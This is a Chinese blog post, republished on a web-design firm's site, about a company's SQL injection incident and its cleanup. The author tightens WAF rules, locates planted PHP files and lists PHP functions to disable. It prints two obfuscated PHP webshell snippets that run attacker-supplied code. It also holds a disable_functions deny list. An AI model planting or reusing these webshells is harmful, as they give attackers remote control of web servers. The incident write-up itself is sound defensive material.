一次與sql注入&webshell的美麗“邂逅”

引言

?一波未平，一波又起。金融公司的業(yè)務(wù)實(shí)在是太引人耳目，何況我們公司的業(yè)處正處于風(fēng)口之上（區(qū)塊鏈金融），并且每天有大量現(xiàn)金交易，所以不知道有多少躲在暗處一直在盯著你的系統(tǒng)，讓你防不勝防，并且想方設(shè)法的找到突破點(diǎn)，以達(dá)到的目的來獲取非法利益。

公司主營業(yè)務(wù)：做網(wǎng)站、網(wǎng)站設(shè)計(jì)、移動網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競爭能力。成都創(chuàng)新互聯(lián)是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對我們的高要求，感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn)，讓我們激情的團(tuán)隊(duì)有機(jī)會用頭腦與智慧不斷的給客戶帶來驚喜。成都創(chuàng)新互聯(lián)推出尤溪免費(fèi)做網(wǎng)站回饋大家。

俗話說：“道高一尺，魔高一丈”。系統(tǒng)和代碼也可以這么理解，防的在好，總有漏洞。系統(tǒng)和代碼也沒有絕對的安全。該來的總會來......

sql注入與“她”相遇

某一天，天氣晴朗，心情舒暢。“她”來了，打破了筆者的美好時(shí)光。下午2點(diǎn)多鐘，筆者和朋友在蘇州街的天使匯二樓極客咖啡參加某個(gè)云廠商的Kubernetes一場技術(shù)沙龍，正聽得興致勃勃的時(shí)候，筆者的公司群里有個(gè)php開發(fā)突然帖出一張圖：

?這個(gè)時(shí)候，群里翻騰了。沒錯(cuò)，被SQL注入了，數(shù)據(jù)庫的表被注入了字段，并且經(jīng)檢查后，發(fā)現(xiàn)這個(gè)庫中的大部分表都被注入了這個(gè)字段。我的電腦沒帶在身邊，真是著急，馬上跟總監(jiān)說明問題嚴(yán)重性。由于我電腦不在身邊， 只能把數(shù)據(jù)庫賬號授權(quán)（讀寫權(quán)限）給那個(gè)php開發(fā)，讓他檢查所有的表，把被注入的字段刪除掉。并查看數(shù)據(jù)和其它表有沒有被修改。好在發(fā)現(xiàn)急時(shí)，數(shù)據(jù)和業(yè)務(wù)都沒有被丟失和損壞。

?這里我要說明一下，我們的業(yè)務(wù)都在阿里云，項(xiàng)目是以php為主，并且開通了waf防火墻，只是waf上的防護(hù)措施比較寬松。筆者在安全方面的經(jīng)驗(yàn)也比較欠缺，好在開通了阿里云的WAF，讓筆者在排查和防護(hù)上也變得輕松和快捷。

?此時(shí)，我已經(jīng)在回家的路上，回到家中迅速打開電腦。

調(diào)整waf策略

由于筆者也是剛接手工作，阿里云上的很多策略還沒得到及時(shí)調(diào)整。所以才這么容易被攻進(jìn)來。即然被注入了，肯定要把源給揪出來。我也在次把所有的表都檢查一遍，確認(rèn)沒問題后，在去調(diào)整waf策略，進(jìn)入阿里云。

1、進(jìn)入相關(guān)域名的防護(hù)配置，我們先來看下調(diào)整前的策略，如下圖：

從上圖可以看出，“Web應(yīng)用防護(hù)”策略是寬松模式，其主要作用就是防護(hù)SQL注入、XSS跨站等常見Web應(yīng)用，寬松模式下對業(yè)務(wù)的誤報(bào)程度最低，但也容易漏過***。“惡意IP懲罰”也沒啟用。這么寬松的防護(hù)措施風(fēng)險(xiǎn)比較大。趕緊先調(diào)整吧。

2、調(diào)整后的策略（如有多個(gè)域名，都調(diào)整過來），如下圖：

防護(hù)策略調(diào)整過了，還需要把問題根源找到啊，這才是最重要的?。。?/p>

查找可疑文件

此時(shí)，php的項(xiàng)目源碼分布在好幾臺服務(wù)器上，如果靠傳統(tǒng)方式去排查，挨個(gè)檢查這些服務(wù)器的目錄，各種能用的命令都用上了，是不是也挺費(fèi)勁費(fèi)時(shí)的，還不知道要查到啥時(shí)候。這個(gè)時(shí)候，阿里有項(xiàng)服務(wù)起到關(guān)鍵的作用了：“態(tài)勢感知”，這個(gè)需要升級為企業(yè)版本（費(fèi)用不高，我們公司開通了一年，費(fèi)用6000多塊）。這就是用阿里的好處（不是打廣告），確實(shí)讓你省心。
1、進(jìn)入“態(tài)勢感知”查看一下，就立馬發(fā)現(xiàn)了一堆異常行為，遍布在好幾臺服務(wù)器上如下圖：

2、點(diǎn)幾個(gè)異常行為進(jìn)入看看，我就打開其中兩個(gè)行為看一下，其它的行為也都差不多，如下圖：

從命令行參數(shù)中可以看出相關(guān)目錄有/Mode/Lite/，并且給出的解決方案是及時(shí)排查可疑目錄下的信息并及時(shí)清除。筆者順著給出的提示在服務(wù)器上進(jìn)行 find 相關(guān)目錄，查找出目錄所在路徑，如下圖：

順藤摸瓜吧，列一下這個(gè)目錄的文件：

從上圖發(fā)現(xiàn)了有兩個(gè)異常的php文件，目錄屬主也和其它文件不一樣，筆者打開代碼倉庫也進(jìn)入相同的目錄進(jìn)行比對，代碼倉庫中確實(shí)沒有這兩個(gè)文件。為了確認(rèn)清楚，把這兩個(gè)文件down下來發(fā)給開發(fā)。開發(fā)說項(xiàng)目中沒有這兩個(gè)文件。把它down下來打開文件看看：

Content.class.php文件內(nèi)容：

<?php @($_=base64_decode($_POST[1])).$_(hex2bin($_POST[2]))?>
}

這代碼不就是被注入的表里的字段嗎，上面這段代碼大概意思為：把post請求的兩個(gè)參數(shù)，一個(gè)用base64解密，一個(gè)用hex2bin轉(zhuǎn)成16進(jìn)制，然后拼接在一起，應(yīng)該是把操作數(shù)據(jù)庫的語句加密傳過來，然后解密，這樣就不會被攔截掉。如果哪位博友認(rèn)為解釋的有誤，一定要提出來。

Lite.class.php文件內(nèi)容：

<?php if(isset($_REQUEST['error'])&&isset($_REQUEST['limit'])){
    $page = $_REQUEST['error'];
    $limit = $_REQUEST['limit'];
    $func = base64_decode(str_rot13(strrev($limit)));
    $func(base64_decode(str_rot13(strrev($page))));
    exit;

上面的代碼其實(shí)和之前的那段代碼有共性，反轉(zhuǎn)字符串然后ROT13 編碼，然后base64解碼，最后按照 PHP 代碼來計(jì)算，至于base64_decode，str_rot13，strrev是為了繞過WAF等安全設(shè)備的過濾。

已經(jīng)很明顯了，就是由上面這些代碼文件Content.class.php等文件給注入的。不用想了：rm -rf 吧。這個(gè)動態(tài)感知還是挺好用的，能快速定位到風(fēng)險(xiǎn)目錄，讓你減少排查的時(shí)間和精力。

為了保險(xiǎn)起見，繼續(xù)排查一下其它的目錄是否也存在可疑文件，一定要排查干凈了，操作一定要小心，也別誤刪，果然在同級目錄下又發(fā)現(xiàn)一個(gè)，如下圖：

還有一個(gè)，如下圖：

和代碼倉庫、開發(fā)的對比，可以確定這兩個(gè)也是***傳進(jìn)來的可疑文件，我有一個(gè)習(xí)慣，刪除文件之前喜歡備份到本地。備份好這些可疑文件到本地之，都徹底清除掉。

雖然都清除掉了，waf防火墻也調(diào)整了，但是也沒有絕對的安全，還需要把php這些危險(xiǎn)的函數(shù)禁用掉，比如禁用phpinfo、exec()、system()等：

phpinfo()
功能描述：輸出 PHP 環(huán)境信息以及相關(guān)的模塊、WEB 環(huán)境等信息。
危險(xiǎn)等級：中

passthru()
功能描述：允許執(zhí)行一個(gè)外部程序并回顯輸出，類似于 exec()。
危險(xiǎn)等級：高

exec()
功能描述：允許執(zhí)行一個(gè)外部程序（如 UNIX Shell 或 CMD 命令等）。
危險(xiǎn)等級：高

system()
功能描述：允許執(zhí)行一個(gè)外部程序并回顯輸出，類似于 passthru()。
危險(xiǎn)等級：高

chroot()
功能描述：可改變當(dāng)前 PHP 進(jìn)程的工作根目錄，僅當(dāng)系統(tǒng)支持 CLI 模式
PHP 時(shí)才能工作，且該函數(shù)不適用于 Windows 系統(tǒng)。
危險(xiǎn)等級：高

scandir()
功能描述：列出指定路徑中的文件和目錄。
危險(xiǎn)等級：中

chgrp()
功能描述：改變文件或目錄所屬的用戶組。
危險(xiǎn)等級：高

chown()
功能描述：改變文件或目錄的所有者。
危險(xiǎn)等級：高

shell_exec()
功能描述：通過 Shell 執(zhí)行命令，并將執(zhí)行結(jié)果作為字符串返回。
危險(xiǎn)等級：高

proc_open()
功能描述：執(zhí)行一個(gè)命令并打開文件指針用于讀取以及寫入。
危險(xiǎn)等級：高

proc_get_status()
功能描述：獲取使用 proc_open() 所打開進(jìn)程的信息。
危險(xiǎn)等級：高

ini_alter()
功能描述：是 ini_set() 函數(shù)的一個(gè)別名函數(shù)，功能與 ini_set() 相同。
具體參見 ini_set()。
危險(xiǎn)等級：高

ini_set()
功能描述：可用于修改、設(shè)置 PHP 環(huán)境配置參數(shù)。
危險(xiǎn)等級：高

ini_restore()
功能描述：可用于恢復(fù) PHP 環(huán)境配置參數(shù)到其初始值。
危險(xiǎn)等級：高

dl()
功能描述：在 PHP 進(jìn)行運(yùn)行過程當(dāng)中（而非啟動時(shí)）加載一個(gè) PHP 外部模塊。
危險(xiǎn)等級：高

pfsockopen()
功能描述：建立一個(gè) Internet 或 UNIX 域的 socket 持久連接。
危險(xiǎn)等級：高

symlink()
功能描述：在 UNIX 系統(tǒng)中建立一個(gè)符號鏈接。
危險(xiǎn)等級：高

popen()
功能描述：可通過 popen() 的參數(shù)傳遞一條命令，并對 popen() 所打開的文件進(jìn)行執(zhí)行。
危險(xiǎn)等級：高

putenv()
功能描述：用于在 PHP 運(yùn)行時(shí)改變系統(tǒng)字符集環(huán)境。在低于 5.2.6 版本的 PHP 中，可利用該函數(shù)
修改系統(tǒng)字符集環(huán)境后，利用 sendmail 指令發(fā)送特殊參數(shù)執(zhí)行系統(tǒng) SHELL 命令。
危險(xiǎn)等級：高

禁用方法如下：
打開/etc/php.ini文件，查找到 disable_functions ，添加需禁用的函數(shù)名，如下：
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen

趁著這次事件，把其它服務(wù)器也一并排查一下吧，需要點(diǎn)耐心慢慢排查，***把這些可疑文件偽裝的非常好，繞過了waf墻，人的肉眼不仔細(xì)看它都看不出來，所以還是要自己細(xì)心一點(diǎn)干活。

需要聲明一下：每個(gè)人的做事方式都不一樣，本文只是把筆者遇到的事件分享給大家，僅作為交流和學(xué)習(xí)。

名詞解釋

sql注入：

所謂SQL注入，就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串，最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來說，它是利用現(xiàn)有應(yīng)用程序，將（惡意的）SQL命令注入到后臺數(shù)據(jù)庫引擎執(zhí)行的能力，它可以通過在Web表單中輸入（惡意）SQL語句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫，而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語句。 比如先前的很多影視網(wǎng)站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的，這類表單特別容易受到SQL注入式***．

webshell：

webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境，也可以將其稱做為一種網(wǎng)頁后門。在了一個(gè)網(wǎng)站后，通常會將asp或php后門文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁文件混在一起，然后就可以使用瀏覽器來訪問asp或者php后門，得到一個(gè)命令執(zhí)行環(huán)境，以達(dá)到控制網(wǎng)站服務(wù)器的目的。
顧名思義，“web”的含義是顯然需要服務(wù)器開放web服務(wù)，“shell”的含義是取得對服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為***者通過網(wǎng)站端口對網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限。由于webshell其大多是以動態(tài)腳本的形式出現(xiàn)，也有人稱之為網(wǎng)站的后門工具。

安全防范小結(jié)

歸納一下，主要有以下幾點(diǎn)：
1.永遠(yuǎn)不要信任用戶的輸入。對用戶的輸入進(jìn)行校驗(yàn)，可以通過正則表達(dá)式，或限制長度；對單引號和雙"-"進(jìn)行轉(zhuǎn)換等。
2.永遠(yuǎn)不要使用動態(tài)拼裝sql，可以使用參數(shù)化的sql或者直接使用存儲過程進(jìn)行數(shù)據(jù)查詢存取。
3.永遠(yuǎn)不要使用管理員權(quán)限的數(shù)據(jù)庫連接，為每個(gè)應(yīng)用使用單獨(dú)的權(quán)限有限的數(shù)據(jù)庫連接。
4.不要把機(jī)密信息直接存放，加密或者h(yuǎn)ash掉密碼和敏感的信息。
5.應(yīng)用的異常信息應(yīng)該給出盡可能少的提示，最好使用自定義的錯(cuò)誤信息對原始錯(cuò)誤信息進(jìn)行包裝。
6.sql注入的檢測方法一般采取輔助軟件或網(wǎng)站平臺來檢測，軟件一般采用sql注入檢測工具jsky，網(wǎng)站平臺就有億思網(wǎng)站安全平臺檢測工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入，XSS***等。

參考：https://baike.baidu.com/item/sql%E6%B3%A8%E5%85%A5/150289?fr=aladdin
參考：https://baike.baidu.com/item/webshell/966625?fr=aladdin
參考：https://yq.aliyun.com/ziliao/8531
參考：https://www.cnblogs.com/huaxiamingwang/archive/2012/02/22/2363849.html

本章內(nèi)容到此結(jié)束，喜歡我的文章，請點(diǎn)擊最上方右角處的《關(guān)注》！?。?/p>

分享題目：一次與sql注入&webshell的美麗“邂逅”
網(wǎng)頁URL：http://muchs.cn/article14/jophde.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信公眾號、服務(wù)器托管、搜索引擎優(yōu)化、網(wǎng)站改版、靜態(tài)網(wǎng)站、自適應(yīng)網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)